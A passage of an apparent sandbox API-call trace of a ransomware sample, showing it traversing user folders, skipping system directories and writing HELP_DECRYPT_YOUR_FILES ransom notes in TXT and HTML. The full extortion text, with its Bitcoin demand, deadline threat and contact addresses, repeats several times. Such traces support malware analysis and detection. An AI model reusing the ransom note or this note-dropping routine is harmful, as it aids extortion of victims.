not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.482] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.496] CloseHandle (hObject=0x380) returned 1
	[0179.497] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.497] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.497] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0179.498] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.498] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\appdata\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.499] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.499] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.499] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0179.499] CloseHandle (hObject=0x380) returned 1
	[0179.500] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.500] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.500] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.500] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\AppData\\HELP_DECRYPT_YOUR_FILES.HTML") returned 53
	[0179.500] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\appdata\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.506] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.506] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0179.510] CloseHandle (hObject=0x380) returned 1
	[0179.510] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.510] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.511] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.511] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0179.512] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.512] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\appdata\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.512] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.513] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.513] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0179.513] CloseHandle (hObject=0x380) returned 1
	[0179.514] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*.*" (normalized: "c:\\users\\default\\appdata\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x848672b0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0179.514] lstrlenW (lpString="C:\\Users\\Default\\AppData\\*.*") returned 28
	[0179.514] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.514] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\AppData\\*.*", cchLength=0x1c | out: lpsz="c:\\users\\default\\appdata\\*.*") returned 0x1c
	[0179.514] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.514] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="windows") returned 0x0
	[0179.515] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.515] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="boot") returned 0x0
	[0179.515] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.515] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="system volume information") returned 0x0
	[0179.515] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.515] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.515] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.516] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="temp") returned 0x0
	[0179.516] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.516] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="program files") returned 0x0
	[0179.517] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.517] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.517] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.517] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="appdata") returned="appdata\\*.*"
	[0179.517] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0179.518] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d54d8a8, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d54d8a8, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d54d8a8, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1
	[0179.518] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1
	[0179.518] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1
	[0179.518] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0179.518] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.518] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Application Data" | out: lpString1="C:\\Users\\Default\\Application Data") returned="C:\\Users\\Default\\Application Data"
	[0179.518] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Application Data" | out: lpString1="C:\\Users\\Default\\Application Data") returned="C:\\Users\\Default\\Application Data"
	[0179.518] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Application Data\\") returned="C:\\Users\\Default\\Application Data\\"
	[0179.519] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Application Data\\" | out: lpString1="C:\\Users\\Default\\Application Data\\") returned="C:\\Users\\Default\\Application Data\\"
	[0179.519] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Application Data\\*.*") returned="C:\\Users\\Default\\Application Data\\*.*"
	[0179.519] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Application Data\\*.*" (normalized: "c:\\users\\default\\application data\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x848672b0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xffffffff
	[0179.519] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0179.519] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Application Data" | out: lpString1="C:\\Users\\Default\\Application Data") returned="C:\\Users\\Default\\Application Data"
	[0179.519] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Application Data\\*.*") returned="C:\\Users\\Default\\Application Data\\*.*"
	[0179.520] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.520] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.520] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Application Data\\HELP_DECRYPT_YOUR_FILES.TXT") returned 61
	[0179.520] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\application data\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.525] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.525] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.528] CloseHandle (hObject=0x380) returned 1
	[0179.528] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.529] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0179.530] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.530] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\application data\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.530] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.531] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.531] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0179.531] CloseHandle (hObject=0x380) returned 1
	[0179.531] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.532] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.533] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.533] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Application Data\\HELP_DECRYPT_YOUR_FILES.HTML") returned 62
	[0179.533] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\application data\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.537] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.537] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0179.540] CloseHandle (hObject=0x380) returned 1
	[0179.540] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.540] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.541] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0179.542] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.542] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\application data\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.543] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.543] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.543] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0179.543] CloseHandle (hObject=0x380) returned 1
	[0179.543] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Application Data\\*.*" (normalized: "c:\\users\\default\\application data\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x848672b0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xffffffff
	[0179.544] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0179.544] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1
	[0179.544] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1
	[0179.544] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1
	[0179.544] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0179.544] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.544] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Cookies" | out: lpString1="C:\\Users\\Default\\Cookies") returned="C:\\Users\\Default\\Cookies"
	[0179.544] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Cookies" | out: lpString1="C:\\Users\\Default\\Cookies") returned="C:\\Users\\Default\\Cookies"
	[0179.545] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Cookies\\") returned="C:\\Users\\Default\\Cookies\\"
	[0179.545] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Cookies\\" | out: lpString1="C:\\Users\\Default\\Cookies\\") returned="C:\\Users\\Default\\Cookies\\"
	[0179.545] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Cookies\\*.*") returned="C:\\Users\\Default\\Cookies\\*.*"
	[0179.545] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Cookies\\*.*" (normalized: "c:\\users\\default\\cookies\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x848672b0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xffffffff
	[0179.545] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0179.545] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Cookies" | out: lpString1="C:\\Users\\Default\\Cookies") returned="C:\\Users\\Default\\Cookies"
	[0179.545] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Cookies\\*.*") returned="C:\\Users\\Default\\Cookies\\*.*"
	[0179.546] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.546] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.546] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Cookies\\HELP_DECRYPT_YOUR_FILES.TXT") returned 52
	[0179.546] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\cookies\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.559] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
